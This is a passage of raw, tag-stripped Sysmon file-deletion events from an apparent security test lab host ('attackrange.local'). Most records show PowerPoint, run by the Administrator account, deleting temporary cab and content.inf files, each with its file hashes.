23542300x800000000000000081440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.247{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4195.tmpMD5=53C5F45B22E133B28D4BD3B5A350FDBD,SHA256=8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.231{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab41F1.tmpMD5=9C9F49A47222C18025CC25575337A965,SHA256=ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.231{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab41A0.tmpMD5=466E5851E601CEFA5F84681011165ED0,SHA256=C8B322819A2F84BF80ACD654AAAAC3E08DEBB533B1086021078EFFBA27968A37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.231{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4266.tmpMD5=ABBF10CEE9480E41D81277E9538F98CB,SHA256=557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.231{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4199.tmpMD5=828F96031F40BF8EBCB5E52AAEEB7E4C,SHA256=640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.231{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD4226.tmp\content.infMD5=C9812793A4E94320C49C7CA054EE6AA4,SHA256=A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.216{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4194.tmpMD5=E29CE2663A56A1444EAA3732FFB82940,SHA256=3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.216{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD4276.tmp\Content.infMD5=D79B5DE6D93AC06005761D88783B3EE6,SHA256=96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.216{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4079.tmpMD5=57399106826184403A379F7A9A869AD3,SHA256=3779E325D94B6FA8023669DA99CF47A3169E6648913018886647ECB9E6F735E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.216{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD4205.tmp\content.infMD5=0FEA64606C519B78B7A52639FEA11492,SHA256=60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.216{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab419D.tmpMD5=93FA9F779520AB2D22AC4EA864B7BB34,SHA256=6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.216{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4192.tmpMD5=E1101CCA6E3FEDB28B57AF4C41B50D37,SHA256=69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.216{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab419F.tmpMD5=271FF904CEB8B5383B45ECF0DA6A9238,SHA256=1D9C6C49026503E16D584633211DF49B82191F3988F466C7F12D29C8AE5E4E4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.216{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab417D.tmpMD5=21437897C9B88AC2CB2BB2FEF922D191,SHA256=372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.216{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab419A.tmpMD5=D4EAC009E9E7B64B8B001AE82B8102FA,SHA256=8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.216{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41F4.tmp\content.infMD5=8D1E1991838307E4C2197ECB5BA9FA79,SHA256=4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.200{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab419B.tmpMD5=26BEAB9CCEAFE4FBF0B7C0362681A9D2,SHA256=217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.200{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD4225.tmp\content.infMD5=AA7B919B21FD42C457948DE1E2988CB3,SHA256=5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.200{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4196.tmpMD5=BF95E967E7D1CEC8EFE426BC0127D3DE,SHA256=4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.200{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab417C.tmpMD5=1C12315C862A745A647DAD546EB4267E,SHA256=4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.200{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41E0.tmp\content.infMD5=52829318BDC6E0269BFB0626D2D1C1E2,SHA256=A73279946A11C61E07A92A61FEB90A2B741B9CCA0F86C718B79E4BD06C18456D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.200{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4080.tmpMD5=EE0129C7CC1AC92BBC3D6CB0F653FCAE,SHA256=345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41DE.tmp\content.infMD5=1F4035219DC6A0E9FD3A3164C6B6D0E6,SHA256=6AC194049AB034406AD36F9C4436CFC74BF03664A3C025F91D642779D15B9DFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab417B.tmpMD5=F93364EEC6C4FFA5768DE545A2C34F07,SHA256=296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41DD.tmp\content.infMD5=06B3DDEFF905F75FA5FA5C5B70DCB938,SHA256=72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4065.tmpMD5=EBCF724F8885692BB8E2EE2406AADC02,SHA256=80ADC8C9EDE235AD8CD45EEACE2F40227ABA01D9FEF261756F4A4C44EAFB146B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4062.tmpMD5=0F56B43D83616D6A60134BF50F9E684E,SHA256=9F4CD66A196D3874BA6BC74F9320F4EADDE09586DCB0AE00ADF0A56EC3EEE5F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41E1.tmp\content.infMD5=7A218A379D40D2E5944DF3D26A11273C,SHA256=D1CEBEB92A3F7E0EA94AC966FF80ABC0BDE8B1087DAC1A197EF74C065F38565C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41DA.tmp\content.infMD5=C601540411B7C0E6DE93621C69A0B71D,SHA256=6690E31622155199015B15E94B39C52BEBD081611F4AE0A9E3299CC56AF8EE33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41DB.tmp\content.infMD5=5402138088A9CF0993C08A0CA81287B8,SHA256=5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41D8.tmp\content.infMD5=960E28B1E0AB3522A8A8558C02694ECF,SHA256=2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41DF.tmp\content.infMD5=35AFE8D8724F3E19EB08274906926A0B,SHA256=97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41D9.tmp\content.infMD5=327DA4A5C757C0F1449976BE82653129,SHA256=341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41D7.tmp\content.infMD5=CD465E8DA15E26569897213CA9F6BC9C,SHA256=D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41B3.tmp\content.infMD5=7956D2B60E2A254A07D46BCA07D0EFF0,SHA256=C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.169{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4078.tmpMD5=C4AF49F2FBC299AE7D3B8285BC0890C9,SHA256=30AEC7F9ECDAD690A2CB38BA6A2E07C8158175140B76F17AAE7D828A42A727A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.169{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41D6.tmp\content.infMD5=1C5D58A5ED3B40486BC22B254D17D1DD,SHA256=EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.169{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41DC.tmp\content.infMD5=40FF521ED2BA1B015F17F0B0E5D95068,SHA256=CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.169{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41B1.tmp\content.infMD5=71CCB69AF8DD9821F463270FB8CBB285,SHA256=8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.169{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab417A.tmpMD5=65828DC7BE8BA1CE61AD7142252ACC54,SHA256=849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.169{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab40B6.tmpMD5=84D8F3848E7424CBE3801F9570E05018,SHA256=B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.169{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4086.tmpMD5=8B29FAB506FD65C21C9CD6FE6BBBC146,SHA256=773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.169{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab407A.tmpMD5=B9A6FF715719EE9DE16421AB983CA745,SHA256=E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.169{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.169{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab407E.tmpMD5=9A07035EF802BF89F6ED254D0DB02AB0,SHA256=6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.169{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4082.tmpMD5=66C5199CF4FB18BD4F9F3F2CCB074007,SHA256=4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.169{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab407B.tmpMD5=97F5B7B7E9E1281999468A5C42CB12E7,SHA256=1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.169{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41B0.tmp\Content.infMD5=6C489D45F3B56845E68BE07EA804C698,SHA256=3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.169{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD4177.tmp\content.infMD5=28404EC391B6387F3F2CF0A5BAE7D20E,SHA256=D870840CE4C7EE578CE1932C463B7760E31ECDF143CFBB9C194F488953E3BA70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.169{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41B4.tmp\content.infMD5=BD6B5A98CA4E6C5DBA57C5AD167EDD00,SHA256=F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.153{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4067.tmpMD5=D30AD26DBB6DECA4FDD294F48EDAD55D,SHA256=6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.153{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4084.tmpMD5=E532038762503FFA1371DF03FA2E222D,SHA256=5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.153{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4081.tmpMD5=EF9CB8BDFBC08F03BEF519AD66BA642F,SHA256=93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.153{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4063.tmpMD5=AD2D82C2A623C1176D25727003F474A6,SHA256=34A36FF02892FD8F89C77992EC7A7EB0FD1459483ECCBBEE139C38646E8685FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.153{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft 